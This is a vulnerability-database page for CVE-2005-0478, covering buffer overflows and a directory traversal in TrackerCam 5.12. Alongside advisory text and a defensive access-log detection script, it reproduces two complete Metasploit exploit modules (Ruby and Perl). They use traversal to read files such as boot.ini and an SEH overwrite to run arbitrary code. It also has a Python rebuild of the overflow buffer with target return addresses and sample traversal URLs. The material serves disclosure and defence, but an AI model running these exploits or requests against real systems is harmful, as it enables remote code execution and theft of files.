CVE-2005-0478
CVSS 5.0
Published: 2005-03-30 00:00:00
Revised: 2008-09-05 16:46:24

[Original text] Multiple buffer overflows in TrackerCam 5.12 and earlier allow remote attackers to cause a denial of service and possibly execute arbitrary code via (1) an HTTP request with a long User-Agent header or (2) a long argument to an arbitrary PHP script.


[CNNVD] TrackerCam Multiple Buffer Overflow Vulnerabilities (CNNVD-200503-160)

        TrackerCam is web-based webcam viewing and management software.
        The TrackerCam implementation contains multiple security vulnerabilities. A remote attacker can exploit them to execute arbitrary code on the server, obtain sensitive information, or cause a denial of service.
        The specific vulnerabilities are:
        1. An overlong User-Agent header value (more than 216 bytes) in an HTTP request overflows a server-side buffer.
        2. An overlong argument (more than 256 bytes) passed to a PHP script in an HTTP request overflows a server-side buffer.
        3. The ComGetLogFile.php3 script does not adequately validate or filter the fn parameter; a remote attacker can insert "../" sequences into it to traverse the server's directories and read arbitrary files.
        4. An attacker can inject HTML code into the log files.
        5. The ComGetLogFile.php3 script can be used to view login-related information recorded in the logs, including passwords.
        6. Repeatedly sending HTTP requests with a negative Content-Length header crashes the server.
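Of the six issues above, four leave a visible trace in ordinary web-server access logs: the traversal and log-reading requests to ComGetLogFile.php3, an oversized script argument, and an oversized User-Agent. The detection logic below is an added example for this entry, not code from CNNVD, the advisory or the TrackerCam vendor. It assumes requests are logged in Apache/NCSA "combined" format (the sample log embedded in the block is constructed, with request lines modelled on the BID examples and the Metasploit check) and uses the length limits the advisory gives. A negative Content-Length (issue 6) is a request header that access logs do not record, so that condition needs reverse-proxy or packet-level inspection and is deliberately not matched here.

```python
"""Access-log detection for the TrackerCam issues listed above.

Added example for this entry; not code from CNNVD, the advisory or the
TrackerCam vendor. Assumptions (not in the original): requests are logged in
Apache/NCSA "combined" format, and the sample lines below are constructed.
The length limits are the ones the advisory gives (User-Agent > 216 bytes,
PHP argument > 256 bytes). A negative Content-Length (issue 6) is a request
header that access logs do not record, so it is not matched here.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

UA_LIMIT = 216    # advisory: a User-Agent longer than this overflows
ARG_LIMIT = 256   # advisory: a PHP argument longer than this overflows

# host ident user [time] "method target proto" status size "referer" "user-agent"
_COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_combined(line):
    """Split one combined-format line into fields, or None if it does not parse."""
    m = _COMBINED.match(line.rstrip("\r\n"))
    return m.groupdict() if m else None


def classify(line):
    """Return the names of the rules a log line matches (empty list if benign)."""
    rec = parse_combined(line)
    if rec is None:
        return ["unparseable"]
    hits = []

    # Issue 1: overlong User-Agent. The overflow is about bytes on the wire,
    # so compare the encoded length rather than the character count.
    if len(rec["ua"].encode("latin-1", "replace")) > UA_LIMIT:
        hits.append("ua_overflow")

    url = urlsplit(rec["target"])
    path = unquote(url.path).lower()
    params = parse_qsl(url.query, keep_blank_values=True)  # values come back %-decoded

    # Issue 2: any decoded script argument longer than the 256-byte limit.
    if any(len(v.encode("latin-1", "replace")) > ARG_LIMIT for _, v in params):
        hits.append("php_arg_overflow")

    # Issues 3 and 5: ComGetLogFile.php3 reading outside the log directory, or
    # reading a log file that exposes login details. The drive-letter check is
    # an added heuristic for absolute Windows paths, not something the advisory lists.
    if path.endswith("/comgetlogfile.php3"):
        fn = dict(params).get("fn", "").replace("\\", "/")
        if "../" in fn or re.match(r"^[a-z]:/", fn, re.I):
            hits.append("logfile_traversal")
        elif fn.lower().endswith(".log"):
            hits.append("logfile_disclosure")
    return hits


def scan(lines):
    """Run classify() over an iterable of log lines; return (index, hits) for matches."""
    results = []
    for i, line in enumerate(lines):
        hits = classify(line)
        if hits:
            results.append((i, hits))
    return results


# Constructed sample log (not real traffic). The first three request lines
# follow the BID examples and the Metasploit check; the rest are synthetic.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Feb/2005:10:00:01 +0000] "GET /tuner/ComGetLogFile.php3?fn=../HTTPRoot/socket.php3 HTTP/1.0" 200 2311 "-" "-"',
    '10.0.0.5 - - [18/Feb/2005:10:00:02 +0000] "GET /tuner/ComGetLogFile.php3?fn=../../../../windows/system.ini HTTP/1.0" 200 1001 "-" "Mozilla/4.0"',
    '10.0.0.5 - - [18/Feb/2005:10:00:03 +0000] "GET /tuner/ComGetLogFile.php3?fn=Eye2005_02.log HTTP/1.0" 200 5120 "-" "Mozilla/4.0"',
    '10.0.0.5 - - [18/Feb/2005:10:00:04 +0000] "GET /tuner/TunerGuide.php3?userID=' + "A" * 300 + ' HTTP/1.0" 500 0 "-" "Mozilla/4.0"',
    '10.0.0.5 - - [18/Feb/2005:10:00:05 +0000] "GET /index.html HTTP/1.0" 200 800 "-" "' + "B" * 217 + '"',
    '10.0.0.9 - - [18/Feb/2005:10:00:06 +0000] "GET /tuner/TunerGuide.php3?userID=alice HTTP/1.0" 200 3000 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG):
        print(idx, hits)
```

The rules key on decoded values, so a percent-encoded "../" in fn is still caught; the length rules use byte lengths because the overflows are byte-count conditions on the server side.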

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: NONE [no impact on the integrity of the system]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [no special access conditions are required to exploit]
Access vector: [--]
Authentication: NONE [no authentication is required to exploit]

Note that this base vector scores the CVE for availability impact only, while the public exploit modules listed further down demonstrate arbitrary code execution on the Windows targets they support; in practice the issue should be handled as remote code execution rather than as a denial of service.

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0478
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0478
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200503-160
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/19411
(UNKNOWN)  XF  trackercam-php-bo(19411)
http://xforce.iss.net/xforce/xfdb/19409
(UNKNOWN)  XF  trackercam-useragent-bo(19409)
http://www.securityfocus.com/bid/12592
(VENDOR_ADVISORY)  BID  12592
http://www.securityfocus.com/archive/1/390918
(VENDOR_ADVISORY)  BUGTRAQ  20050218 Multiple vulnerabilities in TrackerCam 5.12

- Vulnerability information

TrackerCam Multiple Buffer Overflow Vulnerabilities
Medium  Buffer overflow
2005-03-30 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

        The vendor has not yet provided a patch or upgrade. Users of this software are advised to monitor the vendor's home page for the latest version:
        http://www.trackercam.com

- Vulnerability information (16811)

TrackerCam PHP Argument Buffer Overflow (EDBID:16811)
windows webapps
2010-05-09 Verified
8090 metasploit
##
# $Id: trackercam_phparg_overflow.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'TrackerCam PHP Argument Buffer Overflow',
			'Description'    => %q{
					This module exploits a simple stack buffer overflow in the
				TrackerCam web server. All current versions of this software
				are vulnerable to a large number of security issues. This
				module abuses the directory traversal flaw to gain
				information about the system and then uses the PHP overflow
				to execute arbitrary code.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2005-0478'],
					[ 'OSVDB', '13953'],
					[ 'OSVDB', '13955'],
					[ 'BID', '12592'],
					[ 'URL', 'http://aluigi.altervista.org/adv/tcambof-adv.txt'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 2048,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# EyeWD.exe has a null and we can not use a partial overwrite.
					# All of the loaded application DLLs have a null in the address,
					# except CPS.dll, which moves around between instances :-(

					['Windows 2000 English',		{ 'Ret' => 0x75022ac4 }], # ws2help.dll
					['Windows XP English SP0/SP1',	{ 'Ret' => 0x71aa32ad }], # ws2help.dll
					['Windows NT 4.0 SP4/SP5/SP6',	{ 'Ret' => 0x77681799 }], # ws2help.dll

					# Windows XP SP2 and Windows 2003 are not supported yet :-/
				],
			'DisclosureDate' => 'Feb 18 2005',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(8090)
			], self.class)
	end

	def check
		res = send_request_raw({
			'uri'   => '/tuner/ComGetLogFile.php3',
			'query' => 'fn=../HTTPRoot/socket.php3'
		}, 5)

		if (res and res.body =~ /fsockopen/)
			fp = fingerprint()
			print_status("Detected a vulnerable TrackerCam installation on #{fp}")
			return Exploit::CheckCode::Confirmed
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		c = connect

		buf = rand_text_english(8192)
		seh = generate_seh_payload(target.ret)
		buf[257, seh.length] = seh

		print_status("Sending request...")
		res = send_request_raw({
			'uri'   => '/tuner/TunerGuide.php3',
			'query' => 'userID=' + buf
		}, 5)

		handler
	end

	def download(path)

		res = send_request_raw({
			'uri'   => '/tuner/ComGetLogFile.php3',
			'query' => 'fn=' + ("../" * 10) + path
		}, 5)

		return if !(res and res.body and res.body =~ /tuner\.css/ and res.body =~ /<pre>/)

		m = res.match(/<pre>(.*)<\/pre><\/body>/smi)
		return if not m
		return m[1]
	end

	def fingerprint

		res = download(rand_text_alphanumeric(12) + '.txt')
		return if not res

		m = res.match(/in <b>(.*)<\/b> on line/smi)
		return if not m

		path = m[1]

		print_status("TrackerCam installation path is #{path}")

		if (path !~ /^C/i)
			print_status("TrackerCam is not installed on the system drive, we can't fingerprint it")
			return
		end

		if (path !~ /Program Files/i)
			print_status("TrackerCam is installed in a non-standard location")
		end

		boot = download('boot.ini')
		return if not boot

		case boot
			when /Windows XP.*NoExecute/i
				return "Windows XP SP2+"
			when /Windows XP/
				return "Windows XP SP0-SP1"
			when /Windows.*2003/
				return "Windows 2003"
			when /Windows.*2000/
				return "Windows 2000"
			else
				return "Unknown OS/SP"
		end
	end

end
		

- Vulnerability information (F82949)

TrackerCam PHP Argument Buffer Overflow (PacketStormID:F82949)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,web,overflow,arbitrary,php
CVE-2005-0478

This Metasploit module exploits a simple stack overflow in the TrackerCam web server. All current versions of this software are vulnerable to a large number of security issues. This Metasploit module abuses the directory traversal flaw to gain information about the system and then uses the PHP overflow to execute arbitrary code.

(The module source in this PacketStorm record is the same trackercam_phparg_overflow.rb listed under Exploit-DB 16811 above, differing only in unexpanded $Id$/$Revision$ keywords and whitespace.)

- Vulnerability information (F36461)

trackercam_phparg_overflow.pm (PacketStormID:F36461)
2005-03-05 00:00:00
H D Moore  
exploit,web,overflow,arbitrary,php
CVE-2005-0478

This module exploits a simple stack overflow in the TrackerCam web server. All current versions of this software are vulnerable to a large number of security issues. This module abuses the directory traversal flaw to gain information about the system and then uses the PHP overflow to execute arbitrary code.

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::trackercam_phparg_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
{
	'Name'     => 'TrackerCam PHP Argument Buffer Overflow',
	'Version'  => '$Revision: 1.3 $',
	'Authors'  => [ 'H D Moore <hdm [at] metasploit.com>' ],
	'Arch'     => [ 'x86' ],
	'OS'       => [ 'win32'],
	'Priv'     => 1,
	'AutoOpts' => { 'EXITFUNC' => 'thread' },
	
	'UserOpts' => 
	{
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 8090],
	},

	'Payload' => 
	{
		'Space'		=> 2048,
		'BadChars'	=> "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
		'Prepend'	=> "\x81\xc4\x54\xf2\xff\xff",	# add esp, -3500					
		'Keys'		=> ['+ws2ord'],
	},

	'Description'  => Pex::Text::Freeform(qq{
		This module exploits a simple stack overflow in the TrackerCam web
	server. All current versions of this software are vulnerable to a large
	number of security issues. This module abuses the directory traversal
	flaw to gain information about the system and then uses the PHP overflow
	to execute arbitrary code.
	}),

	'Refs'    => 
	[
		['OSVDB', '13953'],	
		['OSVDB', '13955'],
		['CVE', '2005-0478'],
		['BID', '12592'],
		['URL', 'http://aluigi.altervista.org/adv/tcambof-adv.txt'],	
	],
	
	'Targets' => 
	[
		# EyeWD.exe has a null and we can not use a partial overwrite.
		# All of the loaded application DLLs have a null in the address...
		# Except CPS.dll, which moves around between instances.
		
		# Windows XP SP2 and Windows 2003 are not supported yet :-/
		
		['Windows 2000 English',		0x75022ac4 ], # ws2help.dll
		['Windows XP English SP0/SP1',	0x71aa32ad ], # ws2help.dll
		['Windows NT 4.0 SP4/SP5/SP6',	0x77681799 ], # ws2help.dll
	],
	
	'Keys'    => ['trackercam'],
};

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Check {
	my $self = shift;
	my $s = $self->Connect;

	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return $self->CheckCode('Connect');
	}
	
	$self->PrintLine("[*] Querying the remote web server...");

	my $path = "/tuner/ComGetLogFile.php3?fn=../HTTPRoot/socket.php3";
	my $req  = "GET $path HTTP/1.0\r\n\r\n";
	
	$s->Send($req);
	my $res = $s->Recv(-1, 5);
	$s->Close;
	
	if ($res =~ /fsockopen/) {
		$self->PrintLine("[*] Vulnerable TrackerCam instance discovered");
		$self->Fingerprint();
		return $self->CheckCode('Confirmed');	
	}

	$self->PrintLine("[*] This TrackerCam service appears to be patched");
	return $self->CheckCode('Safe');
}

sub Exploit {
	my $self		= shift;
	my $target_idx	= $self->GetVar('TARGET');
	my $shellcode	= $self->GetVar('EncodedPayload')->Payload;
	my $target		= $self->Targets->[$target_idx];

	$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);

	my $s = $self->Connect;

	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}
	
	my $bang = Pex::Text::EnglishText(8192);
	
	# Simple as pie.
	substr($bang, 257, 4, pack('V', $target->[1]));
	substr($bang, 253, 2, "\xeb\x06");
	substr($bang, 261, length($shellcode), $shellcode);
	
	my $data  = "GET /tuner/TunerGuide.php3?userID=$bang HTTP/1.0\r\n\r\n";

	$self->PrintLine("[*] Sending " .length($data) . " bytes to remote host.");
	$s->Send($data);
	$s->Recv(-1, 5);
	
	return;
}

# Uses the directory traversal vulnerability to detect the remote OS version
sub Fingerprint {
	my $self = shift;
	my $data = $self->DownloadFile('nobody.txt');
	
	if (! $data ) {
		$self->PrintLine("[*] Download failed for remote test file");
		return;
	}	

	my ($path) = $data =~ m/in <b>(.*)<\/b> on line/smi;
	$self->PrintLine("[*] Install path: $path") if $path;
			
	if (uc(substr($path, 0, 1)) ne 'C') {
		$self->PrintLine("[*] TrackerCam is probably not installed on the system drive");
	}
	
	if ($data !~ /Program Files/) {
		$self->PrintLine("[*] TrackerCam is installed in a non-standard location");

	}
		
	$data = $self->DownloadFile('boot.ini');
	if (! $data ) {
		$self->PrintLine("[*] Download failed for remote boot.ini file");
		return;
	}

	# Windows XP SP2
	if ($data =~ /Windows XP.*NoExecute/i) {
		$self->PrintLine("[*] Detected Windows XP SP2");
		return 'WinXPSP2';
	}

	if ($data =~ /Windows XP/) {
		$self->PrintLine("[*] Detected Windows XP SP0-SP1");
		return 'WinXPSP01';
	}

	if ($data =~ /Windows.*2003/) {
		$self->PrintLine("[*] Detected Windows 2003 Server");
		return 'Win2003';		
	}

	if ($data =~ /Windows.*2000/) {
		$self->PrintLine("[*] Detected Windows 2000");
		return 'Win2000';
	}

	$self->PrintLine("[*] Could not identify this system");
	return;
}

sub DownloadFile {
	my $self = shift;
	my $file = shift;
	
	my $s = $self->Connect;
	return if $s->IsError;
	
	my $path = "/tuner/ComGetLogFile.php3?fn=../../../../../../../../../$file";
	my $req  = "GET $path HTTP/1.0\r\n\r\n";
	
	$s->Send($req);
	my $res = $s->Recv(8192, 5);
	$s->Close;
	
	return if ($res !~ /tuner\.css/ || $res !~ /\<pre\>/ );
	
	my ($data) = $res =~ m/<pre>(.*)/smi;
	$data =~ s/<\/pre><\/body>.*//g if $data;
	
	return $res if ! $data;
	return $data;
}

sub Connect {
	my $self = shift;
	my $s = Msf::Socket::Tcp->new
	(
		'PeerAddr'	=> $self->GetVar('RHOST'),
		'PeerPort'	=> $self->GetVar('RPORT'),
		'SSL'		=> $self->GetVar('SSL'),
		'LocalPort'	=> $self->GetVar('CPORT'),
	);
	return $s;
}

1;
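The Perl module above makes the buffer layout explicit where the Ruby version hides it behind generate_seh_payload: a short jump at offset 253, the overwritten handler pointer at 257, and the payload at 261, all inside a single 8192-byte userID argument. The block below is an added example for this entry, not code from the Metasploit project. It rebuilds that layout as a standalone function, uses the three ws2help.dll addresses listed as targets and the modules' BadChars list, and refuses to assemble anything the query-string path would mangle. The filler and the int3 placeholder standing in for shellcode are constructed here; nothing in the block is a working payload.

```python
"""SEH-overwrite buffer used by the TrackerCam modules above, rebuilt so the
frame can be inspected and checked against the bad-character list.

Added example for this entry; not code from the Metasploit project. It
reproduces the Perl module's offsets (jump at 253, handler pointer at 257,
shellcode at 261, 8192 bytes total), its three ws2help.dll return addresses
and its BadChars. The filler and the int3 placeholder are constructed here.
"""
import struct

# The modules' BadChars: NUL plus the bytes a query-string parser strips or
# re-interprets (':', '&', '?', '%', '#', space, LF, CR, '/', '+', VT, '\').
BAD_CHARS = frozenset(b"\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c")

# Offsets from the Perl module: substr($bang, 253/257/261, ...)
NSEH_OFFSET = 253       # next-SEH pointer: "\xeb\x06" = jmp short +6
SEH_OFFSET = 257        # handler pointer: pop/pop/ret in ws2help.dll
SHELLCODE_OFFSET = 261  # where the short jump lands
TOTAL_LEN = 8192        # size of the filler the modules send

# Return addresses from the Targets list (ws2help.dll, English builds only)
TARGETS = {
    "Windows 2000 English": 0x75022AC4,
    "Windows XP English SP0/SP1": 0x71AA32AD,
    "Windows NT 4.0 SP4/SP5/SP6": 0x77681799,
}


def find_bad_chars(data):
    """Bytes of `data` that appear in BAD_CHARS, de-duplicated and sorted."""
    return sorted(set(data) & BAD_CHARS)


def build_overflow(ret, shellcode, filler=b"A"):
    """Lay out the 8192-byte userID value the way the Perl module does, and
    refuse to build anything the request path would mangle on the way in."""
    ret_le = struct.pack("<I", ret)  # little-endian, as pack('V') in the module
    if find_bad_chars(ret_le):
        raise ValueError(f"return address {ret:#010x} contains bad chars")
    if find_bad_chars(shellcode):
        raise ValueError("shellcode contains bad chars; encode it first")
    if SHELLCODE_OFFSET + len(shellcode) > TOTAL_LEN:
        raise ValueError("shellcode does not fit in the buffer")
    buf = bytearray((filler * TOTAL_LEN)[:TOTAL_LEN])
    buf[NSEH_OFFSET:NSEH_OFFSET + 2] = b"\xeb\x06"       # jmp short over the handler
    buf[SEH_OFFSET:SEH_OFFSET + 4] = ret_le              # overwritten handler pointer
    buf[SHELLCODE_OFFSET:SHELLCODE_OFFSET + len(shellcode)] = shellcode
    return bytes(buf)


def build_request(buf):
    """The HTTP/1.0 request the modules send (no Host header, as in the module)."""
    return b"GET /tuner/TunerGuide.php3?userID=" + buf + b" HTTP/1.0\r\n\r\n"


def decode_frame(buf):
    """Read the SEH record back out of a built buffer, for inspection."""
    disp = struct.unpack("<b", buf[NSEH_OFFSET + 1:NSEH_OFFSET + 2])[0]
    return {
        "jmp": bytes(buf[NSEH_OFFSET:NSEH_OFFSET + 2]),
        "jmp_target": NSEH_OFFSET + 2 + disp,  # short jmp is relative to the next instruction
        "handler": struct.unpack("<I", buf[SEH_OFFSET:SEH_OFFSET + 4])[0],
    }


if __name__ == "__main__":
    placeholder = b"\xcc" * 32  # int3 breakpoints stand in for an encoded payload
    for name, ret in TARGETS.items():
        frame = decode_frame(build_overflow(ret, placeholder))
        print(f"{name}: handler={frame['handler']:#010x} jump->{frame['jmp_target']}")
```

The bad-character check is the part worth keeping: the module lists those bytes because they are exactly the characters a query-string parser strips or rewrites, so any one of them in the handler address or the payload would break the frame before it reaches the overflowed buffer.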

    

- Vulnerability information

13952
TrackerCam HTTP User-Agent Field Remote Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- Vulnerability description

A remote overflow exists in TrackerCam. The server fails to properly check the input of an HTTP User-Agent request resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code resulting in a loss of integrity.

- Timeline

2005-02-18 Unknown
2005-02-18 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- References

- Vulnerability author

- Vulnerability information

TrackerCam Multiple Remote Vulnerabilities
Class: Unknown  Bugtraq ID: 12592
Remote: Yes  Local: No
Published: 2005-02-18 12:00:00  Updated: 2009-11-27 12:45:00
Discovery of these vulnerabilities is credited to Luigi Auriemma <aluigi@autistici.org>.

- Affected program versions

TrackerCam TrackerCam 5.12

- Vulnerability discussion

TrackerCam is prone to multiple remote vulnerabilities, including buffer-overflow issues, a directory-traversal issue, an information-disclosure issue, an HTML-injection issue, and denial-of-service issues.

A remote attacker could exploit these issues to execute arbitrary code, obtain potentially sensitive information, launch phishing attacks or steal cookie-based authentication credentials, and deny service to legitimate users.

- Exploit

The following examples are available:

http://www.example.com:8090/MessageBoard/messages.php?aaaaaaaaaaa[256]aaaa
http://www.example.com:8090/tuner/ComGetLogFile.php3?fn=../../../../windows/system.ini
http://www.example.com:8090/tuner/ComGetLogFile.php3?fn=Eye2005_02.log

An exploit as well as a Metasploit exploit module are available:

- Solution

Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- References